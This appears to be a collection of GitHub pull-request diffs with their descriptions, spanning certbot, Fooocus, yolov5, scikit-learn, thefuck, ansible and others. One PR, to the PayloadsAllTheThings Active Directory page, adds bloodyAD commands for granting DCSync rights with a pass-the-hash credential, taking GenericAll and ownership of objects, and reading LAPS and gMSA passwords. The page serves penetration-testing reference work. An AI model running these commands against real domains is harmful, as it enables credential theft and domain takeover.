+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-luadns[docs]
diff --git a/certbot-dns-nsone/readthedocs.org.requirements.txt b/certbot-dns-nsone/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..dbdee4480bb
--- /dev/null
+++ b/certbot-dns-nsone/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-nsone[docs]
diff --git a/certbot-dns-rfc2136/readthedocs.org.requirements.txt b/certbot-dns-rfc2136/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..df89018ceff
--- /dev/null
+++ b/certbot-dns-rfc2136/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-rfc2136[docs]
diff --git a/certbot-dns-route53/readthedocs.org.requirements.txt b/certbot-dns-route53/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..660a90d0e9e
--- /dev/null
+++ b/certbot-dns-route53/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-route53[docs]
|
As part of #5564, I'm setting up Read the Docs for each of our DNS plugins. To do this, we need to tell Read the Docs how to install the plugin so it can build the documentation about it. We have similar files in the root of the repo and the `acme`, `certbot-apache`, `certbot-compatibility-test`, `certbot-nginx`, and `letshelp-certbot` directories.
Despite having broken lockstep, we should still have each plugin install the latest version of `acme`/`certbot` so the build still works when the version of the plugin in `master` relies on changes in an unreleased version of `acme`/`certbot`.
While not what we should be doing long term, for the purposes of testing this PR I set up the Cloudflare docs to use this branch. You can see the docs at: https://certbot-dns-cloudflare.readthedocs.io/en/latest/
|
https://api.github.com/repos/certbot/certbot/pulls/5696
|
2018-03-09T00:51:40Z
|
2018-03-09T01:24:31Z
|
2018-03-09T01:24:31Z
|
2018-03-09T01:24:33Z
| 2,328
|
certbot/certbot
| 1,238
|
fix: add compatibility for LoRAs in a1111 metadata scheme
|
diff --git a/modules/config.py b/modules/config.py
index 6c02ca13f..b81e218a0 100644
--- a/modules/config.py
+++ b/modules/config.py
@@ -539,6 +539,7 @@ def add_ratio(x):
sdxl_lcm_lora = 'sdxl_lcm_lora.safetensors'
sdxl_lightning_lora = 'sdxl_lightning_4step_lora.safetensors'
+loras_metadata_remove = [sdxl_lcm_lora, sdxl_lightning_lora]
def get_model_filenames(folder_paths, extensions=None, name_filter=None):
diff --git a/modules/meta_parser.py b/modules/meta_parser.py
index 8cd21cbca..70ab8860c 100644
--- a/modules/meta_parser.py
+++ b/modules/meta_parser.py
@@ -1,5 +1,4 @@
import json
-import os
import re
from abc import ABC, abstractmethod
from pathlib import Path
@@ -12,7 +11,7 @@
import modules.sdxl_styles
from modules.flags import MetadataScheme, Performance, Steps
from modules.flags import SAMPLERS, CIVITAI_NO_KARRAS
-from modules.util import quote, unquote, extract_styles_from_prompt, is_json, get_file_from_folder_list, calculate_sha256
+from modules.util import quote, unquote, extract_styles_from_prompt, is_json, get_file_from_folder_list, sha256
re_param_code = r'\s*(\w[\w \-/]+):\s*("(?:\\.|[^\\"])+"|[^,]*)(?:,|$)'
re_param = re.compile(re_param_code)
@@ -110,7 +109,8 @@ def get_steps(key: str, fallback: str | None, source_dict: dict, results: list,
assert h is not None
h = int(h)
# if not in steps or in steps and performance is not the same
- if h not in iter(Steps) or Steps(h).name.casefold() != source_dict.get('performance', '').replace(' ', '_').casefold():
+ if h not in iter(Steps) or Steps(h).name.casefold() != source_dict.get('performance', '').replace(' ',
+ '_').casefold():
results.append(h)
return
results.append(-1)
@@ -204,7 +204,8 @@ def get_lora(key: str, fallback: str | None, source_dict: dict, results: list):
def get_sha256(filepath):
global hash_cache
if filepath not in hash_cache:
- hash_cache[filepath] = calculate_sha256(filepath)
+ # is_safetensors = os.path.splitext(filepath)[1].lower() == '.safetensors'
+ hash_cache[filepath] = sha256(filepath)
return hash_cache[filepath]
@@ -231,8 +232,9 @@ def parse_meta_from_preset(preset_content):
height = height[:height.index(" ")]
preset_prepared[meta_key] = (width, height)
else:
- preset_prepared[meta_key] = items[settings_key] if settings_key in items and items[settings_key] is not None else getattr(modules.config, settings_key)
-
+ preset_prepared[meta_key] = items[settings_key] if settings_key in items and items[
+ settings_key] is not None else getattr(modules.config, settings_key)
+
if settings_key == "default_styles" or settings_key == "default_aspect_ratio":
preset_prepared[meta_key] = str(preset_prepared[meta_key])
@@ -288,6 +290,12 @@ def set_data(self, raw_prompt, full_prompt, raw_negative_prompt, full_negative_p
lora_hash = get_sha256(lora_path)
self.loras.append((Path(lora_name).stem, lora_weight, lora_hash))
+ @staticmethod
+ def remove_special_loras(lora_filenames):
+ for lora_to_remove in modules.config.loras_metadata_remove:
+ if lora_to_remove in lora_filenames:
+ lora_filenames.remove(lora_to_remove)
+
class A1111MetadataParser(MetadataParser):
def get_scheme(self) -> MetadataScheme:
@@ -397,12 +405,19 @@ def parse_json(self, metadata: str) -> dict:
data[key] = filename
break
- if 'lora_hashes' in data and data['lora_hashes'] != '':
+ lora_data = ''
+ if 'lora_weights' in data and data['lora_weights'] != '':
+ lora_data = data['lora_weights']
+ elif 'lora_hashes' in data and data['lora_hashes'] != '' and data['lora_hashes'].split(', ')[0].count(':') == 2:
+ lora_data = data['lora_hashes']
+
+ if lora_data != '':
lora_filenames = modules.config.lora_filenames.copy()
- if modules.config.sdxl_lcm_lora in lora_filenames:
- lora_filenames.remove(modules.config.sdxl_lcm_lora)
- for li, lora in enumerate(data['lora_hashes'].split(', ')):
- lora_name, lora_hash, lora_weight = lora.split(': ')
+ self.remove_special_loras(lora_filenames)
+ for li, lora in enumerate(lora_data.split(', ')):
+ lora_split = lora.split(': ')
+ lora_name = lora_split[0]
+ lora_weight = lora_split[2] if len(lora_split) == 3 else lora_split[1]
for filename in lora_filenames:
path = Path(filename)
if lora_name == path.stem:
@@ -453,11 +468,15 @@ def parse_string(self, metadata: dict) -> str:
if len(self.loras) > 0:
lora_hashes = []
+ lora_weights = []
for index, (lora_name, lora_weight, lora_hash) in enumerate(self.loras):
# workaround for Fooocus not knowing LoRA name in LoRA metadata
- lora_hashes.append(f'{lora_name}: {lora_hash}: {lora_weight}')
+ lora_hashes.append(f'{lora_name}: {lora_hash}')
+ lora_weights.append(f'{lora_name}: {lora_weight}')
lora_hashes_string = ', '.join(lora_hashes)
+ lora_weights_string = ', '.join(lora_weights)
generation_params[self.fooocus_to_a1111['lora_hashes']] = lora_hashes_string
+ generation_params[self.fooocus_to_a1111['lora_weights']] = lora_weights_string
generation_params[self.fooocus_to_a1111['version']] = data['version']
@@ -480,9 +499,7 @@ def get_scheme(self) -> MetadataScheme:
def parse_json(self, metadata: dict) -> dict:
model_filenames = modules.config.model_filenames.copy()
lora_filenames = modules.config.lora_filenames.copy()
- if modules.config.sdxl_lcm_lora in lora_filenames:
- lora_filenames.remove(modules.config.sdxl_lcm_lora)
-
+ self.remove_special_loras(lora_filenames)
for key, value in metadata.items():
if value in ['', 'None']:
continue
diff --git a/modules/util.py b/modules/util.py
index 7c46d946c..9e0fb294b 100644
--- a/modules/util.py
+++ b/modules/util.py
@@ -7,9 +7,9 @@
import os
import cv2
import json
+import hashlib
from PIL import Image
-from hashlib import sha256
import modules.sdxl_styles
@@ -182,16 +182,44 @@ def get_files_from_folder(folder_path, extensions=None, name_filter=None):
return filenames
-def calculate_sha256(filename, length=HASH_SHA256_LENGTH) -> str:
- hash_sha256 = sha256()
+def sha256(filename, use_addnet_hash=False, length=HASH_SHA256_LENGTH):
+ print(f"Calculating sha256 for {filename}: ", end='')
+ if use_addnet_hash:
+ with open(filename, "rb") as file:
+ sha256_value = addnet_hash_safetensors(file)
+ else:
+ sha256_value = calculate_sha256(filename)
+ print(f"{sha256_value}")
+
+ return sha256_value[:length] if length is not None else sha256_value
+
+
+def addnet_hash_safetensors(b):
+ """kohya-ss hash for safetensors from https://github.com/kohya-ss/sd-scripts/blob/main/library/train_util.py"""
+ hash_sha256 = hashlib.sha256()
+ blksize = 1024 * 1024
+
+ b.seek(0)
+ header = b.read(8)
+ n = int.from_bytes(header, "little")
+
+ offset = n + 8
+ b.seek(offset)
+ for chunk in iter(lambda: b.read(blksize), b""):
+ hash_sha256.update(chunk)
+
+ return hash_sha256.hexdigest()
+
+
+def calculate_sha256(filename) -> str:
+ hash_sha256 = hashlib.sha256()
blksize = 1024 * 1024
with open(filename, "rb") as f:
for chunk in iter(lambda: f.read(blksize), b""):
hash_sha256.update(chunk)
- res = hash_sha256.hexdigest()
- return res[:length] if length else res
+ return hash_sha256.hexdigest()
def quote(text):
|
fixes https://github.com/lllyasviel/Fooocus/issues/2600
|
https://api.github.com/repos/lllyasviel/Fooocus/pulls/2615
|
2024-03-23T15:26:49Z
|
2024-03-23T15:37:18Z
|
2024-03-23T15:37:18Z
|
2024-03-23T15:37:18Z
| 2,116
|
lllyasviel/Fooocus
| 7,077
|
Rollback voluptuous to 0.8.9
|
diff --git a/requirements_all.txt b/requirements_all.txt
index 2736313bca9684..998b42c36514ef 100644
--- a/requirements_all.txt
+++ b/requirements_all.txt
@@ -4,7 +4,7 @@ pyyaml>=3.11,<4
pytz>=2016.6.1
pip>=7.0.0
jinja2>=2.8
-voluptuous==0.9.1
+voluptuous==0.8.9
typing>=3,<4
sqlalchemy==1.0.14
diff --git a/setup.py b/setup.py
index 54867d5264e803..3d2d4b4e2c2d42 100755
--- a/setup.py
+++ b/setup.py
@@ -16,7 +16,7 @@
'pytz>=2016.6.1',
'pip>=7.0.0',
'jinja2>=2.8',
- 'voluptuous==0.9.1',
+ 'voluptuous==0.8.9',
'typing>=3,<4',
'sqlalchemy==1.0.14',
]
|
We've had several users report issues with upgrading to Home Assistant 0.25 because it would hang on the installation of voluptuous. We've tracked down the problem, but pending a fix we should roll back voluptuous to 0.8.9.
Issue that I raised with voluptuous: https://github.com/alecthomas/voluptuous/issues/189
|
https://api.github.com/repos/home-assistant/core/pulls/2687
|
2016-08-01T00:14:22Z
|
2016-08-01T00:20:08Z
|
2016-08-01T00:20:08Z
|
2017-03-17T18:35:04Z
| 266
|
home-assistant/core
| 38,666
|
Add train.py `--img-size` floor
|
diff --git a/train.py b/train.py
index b1afaf8ada7..9a844ebac0d 100644
--- a/train.py
+++ b/train.py
@@ -207,7 +207,7 @@ def train(hyp, # path/to/hyp.yaml or hyp dictionary
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
- imgsz = check_img_size(opt.imgsz, gs) # verify imgsz is gs-multiple
+ imgsz = check_img_size(opt.imgsz, gs, floor=gs * 2) # verify imgsz is gs-multiple
# DP mode
if cuda and RANK == -1 and torch.cuda.device_count() > 1:
diff --git a/utils/general.py b/utils/general.py
index 08a3ff6539b..fabd0f35fe9 100755
--- a/utils/general.py
+++ b/utils/general.py
@@ -181,11 +181,11 @@ def check_requirements(requirements='requirements.txt', exclude=()):
print(emojis(s)) # emoji-safe
-def check_img_size(img_size, s=32):
+def check_img_size(img_size, s=32, floor=0):
# Verify img_size is a multiple of stride s
- new_size = make_divisible(img_size, int(s)) # ceil gs-multiple
+ new_size = max(make_divisible(img_size, int(s)), floor) # ceil gs-multiple
if new_size != img_size:
- print('WARNING: --img-size %g must be multiple of max stride %g, updating to %g' % (img_size, s, new_size))
+ print(f'WARNING: --img-size {img_size} must be multiple of max stride {s}, updating to {new_size}')
return new_size
|
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)</sub>
### 🌟 Summary
Enhanced image size verification to ensure compatibility with the model's stride.
### 📊 Key Changes
- Modified the `check_img_size` function to include a `floor` argument.
- Adjusted the image size calculation to respect the new `floor` value alongside the maximum stride (see the sketch after this list).
### 🎯 Purpose & Impact
- **Purpose**: Ensures that the input image size is not only a multiple of the model's stride but also not below a minimum size threshold, improving model compatibility.
- **Impact**: Users may notice a change in the minimum image size used for training, potentially leading to more consistent performance and avoiding errors related to incompatible image sizes. 📈🛠️
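A minimal sketch of the new behaviour, with `make_divisible` re-implemented here only for illustration (assumed to round up to the nearest stride multiple, as in `utils/general.py`):

```python
import math


def make_divisible(x, divisor):
    # assumed helper: round x up to the nearest multiple of divisor
    return math.ceil(x / divisor) * divisor


def check_img_size(img_size, s=32, floor=0):
    # mirrors the patched function: gs-multiple, but never below `floor`
    new_size = max(make_divisible(img_size, int(s)), floor)
    if new_size != img_size:
        print(f'WARNING: --img-size {img_size} must be multiple of max stride {s}, updating to {new_size}')
    return new_size


# train.py now calls check_img_size(opt.imgsz, gs, floor=gs * 2), so with gs=32:
print(check_img_size(640, s=32, floor=64))  # 640, unchanged
print(check_img_size(100, s=32, floor=64))  # rounded up to 128
print(check_img_size(20, s=32, floor=64))   # would be 32, clamped up to the 64 floor
```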
|
https://api.github.com/repos/ultralytics/yolov5/pulls/4099
|
2021-07-21T14:29:54Z
|
2021-07-21T14:50:47Z
|
2021-07-21T14:50:47Z
|
2024-01-19T16:49:35Z
| 436
|
ultralytics/yolov5
| 25,689
|
Use os.path.normcase to have Windows-compatible challenge paths on Windows
|
diff --git a/certbot-ci/certbot_integration_tests/certbot_tests/test_main.py b/certbot-ci/certbot_integration_tests/certbot_tests/test_main.py
index 28a72837000..8601e680480 100644
--- a/certbot-ci/certbot_integration_tests/certbot_tests/test_main.py
+++ b/certbot-ci/certbot_integration_tests/certbot_tests/test_main.py
@@ -148,6 +148,17 @@ def test_certonly(context):
"""Test the certonly verb on certbot."""
context.certbot(['certonly', '--cert-name', 'newname', '-d', context.get_domain('newname')])
+ assert_cert_count_for_lineage(context.config_dir, 'newname', 1)
+
+
+def test_certonly_webroot(context):
+ """Test the certonly verb with webroot plugin"""
+ with misc.create_http_server(context.http_01_port) as webroot:
+ certname = context.get_domain('webroot')
+ context.certbot(['certonly', '-a', 'webroot', '--webroot-path', webroot, '-d', certname])
+
+ assert_cert_count_for_lineage(context.config_dir, certname, 1)
+
def test_auth_and_install_with_csr(context):
"""Test certificate issuance and install using an existing CSR."""
diff --git a/certbot/certbot/_internal/plugins/webroot.py b/certbot/certbot/_internal/plugins/webroot.py
index 484d209d645..88e02998dde 100644
--- a/certbot/certbot/_internal/plugins/webroot.py
+++ b/certbot/certbot/_internal/plugins/webroot.py
@@ -157,7 +157,8 @@ def _create_challenge_dirs(self):
"--webroot-path and --domains, or --webroot-map. Run with "
" --help webroot for examples.")
for name, path in path_map.items():
- self.full_roots[name] = os.path.join(path, challenges.HTTP01.URI_ROOT_PATH)
+ self.full_roots[name] = os.path.join(path, os.path.normcase(
+ challenges.HTTP01.URI_ROOT_PATH))
logger.debug("Creating root challenges validation dir at %s",
self.full_roots[name])
|
Fixes #8597
|
https://api.github.com/repos/certbot/certbot/pulls/8599
|
2021-01-11T23:03:44Z
|
2021-01-13T22:38:58Z
|
2021-01-13T22:38:58Z
|
2021-01-13T22:38:58Z
| 494
|
certbot/certbot
| 2,138
|
Fix merge issues
|
diff --git a/g4f/Provider/bing/upload_image.py b/g4f/Provider/bing/upload_image.py
index 041905fdd9..d92451fa7a 100644
--- a/g4f/Provider/bing/upload_image.py
+++ b/g4f/Provider/bing/upload_image.py
@@ -3,17 +3,14 @@
import string
import random
import json
-import io
-import base64
import math
-from PIL import Image
from ...typing import ImageType
from aiohttp import ClientSession
from ...image import to_image, process_image, to_base64
image_config = {
"maxImagePixels": 360000,
- "imageComp.ssionRate": 0.7,
+ "imageCompressionRate": 0.7,
"enableFaceBlurDebug": 0,
}
diff --git a/g4f/gui/server/backend.py b/g4f/gui/server/backend.py
index 3ccd1a595e..9d12bea5f7 100644
--- a/g4f/gui/server/backend.py
+++ b/g4f/gui/server/backend.py
@@ -110,7 +110,8 @@ def try_response():
'provider': get_last_provider(True)
}) + "\n"
if isinstance(chunk, Exception):
- yield json.dumps({
+ logging.exception(chunk)
+ yield json.dumps({
'type' : 'message',
'message': get_error_message(chunk),
}) + "\n"
|
https://api.github.com/repos/xtekky/gpt4free/pulls/1463
|
2024-01-13T14:56:45Z
|
2024-01-13T14:57:00Z
|
2024-01-13T14:57:00Z
|
2024-01-13T14:57:00Z
| 324
|
xtekky/gpt4free
| 38,051
|
|
[MRG + 1] FIX work-around for read only dataframes
|
diff --git a/sklearn/utils/__init__.py b/sklearn/utils/__init__.py
index e6b38a3fe8fe8..b11feafacf405 100644
--- a/sklearn/utils/__init__.py
+++ b/sklearn/utils/__init__.py
@@ -12,7 +12,7 @@
assert_all_finite, warn_if_not_float,
check_random_state, column_or_1d, check_array,
check_consistent_length, check_X_y, indexable,
- check_symmetric)
+ check_symmetric, DataConversionWarning)
from .class_weight import compute_class_weight, compute_sample_weight
from ..externals.joblib import cpu_count
@@ -149,7 +149,14 @@ def safe_indexing(X, indices):
"""
if hasattr(X, "iloc"):
# Pandas Dataframes and Series
- return X.iloc[indices]
+ try:
+ return X.iloc[indices]
+ except ValueError:
+ # Cython typed memoryviews internally used in pandas do not support
+ # readonly buffers.
+ warnings.warn("Copying input dataframe for slicing.",
+ DataConversionWarning)
+ return X.copy().iloc[indices]
elif hasattr(X, "shape"):
if hasattr(X, 'take') and (hasattr(indices, 'dtype') and
indices.dtype.kind == 'i'):
diff --git a/sklearn/utils/tests/test_utils.py b/sklearn/utils/tests/test_utils.py
index 622335aacc805..19288fdd6e052 100644
--- a/sklearn/utils/tests/test_utils.py
+++ b/sklearn/utils/tests/test_utils.py
@@ -6,7 +6,7 @@
from sklearn.utils.testing import (assert_equal, assert_raises, assert_true,
assert_almost_equal, assert_array_equal,
- SkipTest)
+ SkipTest, assert_warns)
from sklearn.utils import check_random_state
from sklearn.utils import deprecated
@@ -17,6 +17,7 @@
from sklearn.utils import shuffle
from sklearn.utils.extmath import pinvh
from sklearn.utils.mocking import MockDataFrame
+from sklearn.utils.validation import DataConversionWarning
def test_make_rng():
@@ -167,6 +168,14 @@ def test_safe_indexing_pandas():
X_df_indexed = safe_indexing(X_df, inds)
X_indexed = safe_indexing(X_df, inds)
assert_array_equal(np.array(X_df_indexed), X_indexed)
+ # fun with read-only data in dataframes
+ # this happens in joblib memmapping
+ X.setflags(write=False)
+ X_df_readonly = pd.DataFrame(X)
+ X_df_ro_indexed = assert_warns(DataConversionWarning, safe_indexing,
+ X_df_readonly, inds)
+
+ assert_array_equal(np.array(X_df_ro_indexed), X_indexed)
def test_safe_indexing_mock_pandas():
|
Fixes the second part of #4597.
Currently I'm raising a DataConversionWarning, which is not really right. It should be a `DataCopyWarning`, which we don't have yet. Do we want to add that? In light of #4660?
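A condensed, self-contained illustration of the work-around (it mirrors the new test; whether `.iloc` actually raises on a read-only buffer depends on the pandas version):

```python
import warnings

import numpy as np
import pandas as pd

X = np.arange(12).reshape(4, 3)
X.setflags(write=False)        # simulate joblib memmapping handing us a read-only buffer
X_df = pd.DataFrame(X)
inds = np.array([1, 3])

try:
    subset = X_df.iloc[inds]
except ValueError:
    # Cython typed memoryviews inside pandas reject read-only buffers,
    # so slice a copy instead and warn about the extra copy.
    warnings.warn("Copying input dataframe for slicing.")
    subset = X_df.copy().iloc[inds]

print(subset)
```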
|
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/4678
|
2015-05-05T22:41:13Z
|
2015-05-06T14:05:16Z
|
2015-05-06T14:05:16Z
|
2017-05-19T20:46:16Z
| 635
|
scikit-learn/scikit-learn
| 46,753
|
Update bloodyAD attacks
|
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 4848f3d0e1..c15d1dab15 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -2856,10 +2856,10 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
* On Linux:
```bash
# Give DCSync right to the principal identity
- bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B addDomainSync user2
+ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2
# Remove right after DCSync
- bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B delDomainSync user2
+ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False
```
* WriteDACL on Group
@@ -2867,6 +2867,13 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1
net group "INTERESTING_GROUP" User1 /add /domain
```
+ Or
+ ```powershell
+ bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp
+
+ # Remove right
+ bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False
+ ```
#### WriteOwner
@@ -2875,6 +2882,10 @@ An attacker can update the owner of the target object. Once the object owner has
```powershell
Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'
```
+Or
+```powershell
+bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object
+```
This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group.
@@ -2886,6 +2897,10 @@ An attacker can read the LAPS password of the computer account this ACE applies
```powershell
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
```
+Or for a given computer
+```powershell
+bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
+```
#### ReadGMSAPassword
@@ -2900,6 +2915,10 @@ $mp = $gmsa.'msDS-ManagedPassword'
# Decode the data structure using the DSInternals module
ConvertFrom-ADManagedPasswordBlob $mp
```
+Or
+```powershell
+python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword
+```
#### ForceChangePassword
@@ -3953,4 +3972,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
-* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
\ No newline at end of file
+* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
|
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/536
|
2022-09-06T17:13:44Z
|
2022-09-06T17:32:21Z
|
2022-09-06T17:32:21Z
|
2022-11-07T10:51:13Z
| 1,231
|
swisskyrepo/PayloadsAllTheThings
| 8,300
|
|
#1149: Giving a fuck about ModuleNotFoundError
|
diff --git a/README.md b/README.md
index 5ac8b83ef..8aa2294d9 100644
--- a/README.md
+++ b/README.md
@@ -281,6 +281,7 @@ following rules are enabled by default:
* `pyenv_no_such_command` – fixes wrong pyenv commands like `pyenv isntall` or `pyenv list`;
* `python_command` – prepends `python` when you try to run non-executable/without `./` python script;
* `python_execute` – appends missing `.py` when executing Python files;
+* `python_module_error` – fixes ModuleNotFoundError by trying to `pip install` that module;
* `quotation_marks` – fixes uneven usage of `'` and `"` when containing args';
* `path_from_history` – replaces not found path with similar absolute path from history;
* `react_native_command_unrecognized` – fixes unrecognized `react-native` commands;
diff --git a/tests/rules/test_python_module_error.py b/tests/rules/test_python_module_error.py
new file mode 100644
index 000000000..838f9561a
--- /dev/null
+++ b/tests/rules/test_python_module_error.py
@@ -0,0 +1,63 @@
+import pytest
+
+from thefuck.rules.python_module_error import get_new_command, match
+from thefuck.types import Command
+
+
[email protected]
+def module_error_output(filename, module_name):
+ return """Traceback (most recent call last):
+ File "{0}", line 1, in <module>
+ import {1}
+ModuleNotFoundError: No module named '{1}'""".format(
+ filename, module_name
+ )
+
+
[email protected](
+ "test",
+ [
+ Command("python hello_world.py", "Hello World"),
+ Command(
+ "./hello_world.py",
+ """Traceback (most recent call last):
+ File "hello_world.py", line 1, in <module>
+ pritn("Hello World")
+NameError: name 'pritn' is not defined""",
+ ),
+ ],
+)
+def test_not_match(test):
+ assert not match(test)
+
+
+positive_tests = [
+ (
+ "python some_script.py",
+ "some_script.py",
+ "more_itertools",
+ "pip install more_itertools && python some_script.py",
+ ),
+ (
+ "./some_other_script.py",
+ "some_other_script.py",
+ "a_module",
+ "pip install a_module && ./some_other_script.py",
+ ),
+]
+
+
[email protected](
+ "script, filename, module_name, corrected_script", positive_tests
+)
+def test_match(script, filename, module_name, corrected_script, module_error_output):
+ assert match(Command(script, module_error_output))
+
+
[email protected](
+ "script, filename, module_name, corrected_script", positive_tests
+)
+def test_get_new_command(
+ script, filename, module_name, corrected_script, module_error_output
+):
+ assert get_new_command(Command(script, module_error_output)) == corrected_script
diff --git a/thefuck/rules/python_module_error.py b/thefuck/rules/python_module_error.py
new file mode 100644
index 000000000..4696d63b1
--- /dev/null
+++ b/thefuck/rules/python_module_error.py
@@ -0,0 +1,13 @@
+import re
+from thefuck.shells import shell
+
+MISSING_MODULE = r"ModuleNotFoundError: No module named '([^']+)'"
+
+
+def match(command):
+ return "ModuleNotFoundError: No module named '" in command.output
+
+
+def get_new_command(command):
+ missing_module = re.findall(MISSING_MODULE, command.output)[0]
+ return shell.and_("pip install {}".format(missing_module), command.script)
|
Closes #1149
|
https://api.github.com/repos/nvbn/thefuck/pulls/1151
|
2020-12-27T22:30:20Z
|
2021-01-19T21:37:06Z
|
2021-01-19T21:37:05Z
|
2021-01-19T21:41:43Z
| 886
|
nvbn/thefuck
| 30,606
|
Fix malformed string error for hashed_password
|
diff --git a/lib/ansible/modules/network/ios/ios_user.py b/lib/ansible/modules/network/ios/ios_user.py
index 8d675ac8d5a432..9969dc56525fe8 100644
--- a/lib/ansible/modules/network/ios/ios_user.py
+++ b/lib/ansible/modules/network/ios/ios_user.py
@@ -213,7 +213,6 @@
from copy import deepcopy
import re
-import ast
import base64
import hashlib
@@ -269,8 +268,8 @@ def add(command, want, x):
command.append('username %s %s' % (want['name'], x))
def add_hashed_password(command, want, x):
- command.append('username %s secret %s %s' % (want['name'], ast.literal_eval(x)['type'],
- ast.literal_eval(x)['value']))
+ command.append('username %s secret %s %s' % (want['name'], x.get('type'),
+ x.get('value')))
def add_ssh(command, want, x=None):
command.append('ip ssh pubkey-chain')
|
Signed-off-by: NilashishC <[email protected]>
##### SUMMARY
- Fixes a malformed string error while attempting to set hashed_passwords on IOS devices (illustrated below)
##### ISSUE TYPE
- Bugfix Pull Request
##### COMPONENT NAME
ios_user.py
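A rough illustration of the failure mode being fixed (the hash type and value below are made up for the example):
```python
import ast

hashed_password = {"type": 5, "value": "$1$abcd$hypotheticalHashValue"}

# Old behaviour: the option already arrives as a dict, not a string, so
# ast.literal_eval() raises ValueError ("malformed string" on Python 2).
try:
    ast.literal_eval(hashed_password)
except ValueError as exc:
    print("literal_eval failed:", exc)

# New behaviour: read the keys straight off the dict.
print("username admin secret %s %s" % (hashed_password.get("type"),
                                       hashed_password.get("value")))
```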
|
https://api.github.com/repos/ansible/ansible/pulls/51007
|
2019-01-17T06:46:33Z
|
2019-01-17T07:35:50Z
|
2019-01-17T07:35:50Z
|
2019-07-22T17:56:47Z
| 246
|
ansible/ansible
| 48,919
|
Improve installation script for linux
|
diff --git a/start b/start
index 47368fb710..7b9d49fdde 100755
--- a/start
+++ b/start
@@ -36,27 +36,40 @@ function launchWithHungup() {
# get operating system name
os_name=`uname -s`
+# check command avalibility
+function has_command() {
